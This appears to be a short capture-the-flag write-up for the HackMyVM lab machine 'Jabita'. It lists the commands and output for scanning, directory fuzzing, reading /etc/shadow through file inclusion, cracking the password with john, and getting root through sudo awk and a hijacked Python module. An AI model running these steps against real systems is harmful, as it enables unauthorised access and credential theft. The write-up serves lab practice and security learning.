NOTES ABOUT Jabita
[ 2022-09-29 ] [ HackMyVM / Jabita ]Status: Rooted
Skills: Port Scanning, Fuzzing, LFI, Crack Shadow, SSH, Sudo, Python
Tools: nmap, wfuzz, john
PORT SCANNING
$ nmap -v -sS -A -p- 10.0.2.10
[...]
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 00:b0:03:d3:92:f8:a0:f9:5a:93:20:7b:f8:0a:aa:da (ECDSA)
|_ 256 dd:b4:26:1d:0c:e7:38:c3:7a:2f:07:be:f8:74:3e:bc (ED25519)
80/tcp open http Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Site doesn\'t have a title (text/html).
| http-methods:
|_ Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: Apache/2.4.52 (Ubuntu)
[...]
GETTING IN
$ wfuzz -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -r 5 --script=headers,robots,sitemap,listing,links --hc 404 http://10.0.2.10/FUZZ
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://10.0.2.10/FUZZ
Total requests: 220560
[...]
000002398: 301 9 L 28 W 309 Ch "building"
|_ Plugin links: 1 new request enqueued(s) found.
|_ Plugin links: 1 new link(s) found.
[...]
[ TONS OF USELESS LFI2RCE LATER ]
$ curl http://10.0.2.10/building/index.php?page=/etc/passwd > _etc_passwd
$ curl http://10.0.2.10/building/index.php?page=/etc/shadow > _etc_shadow
$ unshadow _etc_passwd _etc_shadow > passwords
$ john --wordlist=/usr/share/wordlists/rockyou.txt --rules passwords
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
joaninha (jack)
1g 0:00:00:07 DONE (2022-09-28 20:16) 0.1312g/s 503.9p/s 503.9c/s 503.9C/s minerva..dodgers
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
$ ssh jack@10.0.2.10
jack@10.0.2.10's password: joaninha
ELEVATING PRIVILEGES
$ sudo -l
Matching Defaults entries for jack on jabita:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty, listpw=never
User jack may run the following commands on jabita:
(jaba : jaba) NOPASSWD: /usr/bin/awk
$ sudo -u jaba awk 'BEGIN {system("/bin/bash")}'
$ id
uid=1002(jaba) gid=1002(jaba) groups=1002(jaba)
$ sudo -l
Matching Defaults entries for jaba on jabita:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty, listpw=never
User jaba may run the following commands on jabita:
(root) NOPASSWD: /usr/bin/python3 /usr/bin/clean.py
$ sudo /usr/bin/python3 /usr/bin/clean.py
Hello
$ cat /usr/bin/clean.py
import wild
wild.first()
$ find / -iname wild.py 2>/dev/null
/usr/lib/python3.10/wild.py
$ ls -la /usr/lib/python3.10/wild.py
-rw-r--rw- 1 root root 29 Sep 5 12:48 /usr/lib/python3.10/wild.py
$ cat /usr/lib/python3.10/wild.py
def first():
print("Hello")
$ echo import 'os; os.system("/bin/bash")' > /usr/lib/python3.10/wild.py
$ sudo /usr/bin/python3 /usr/bin/clean.py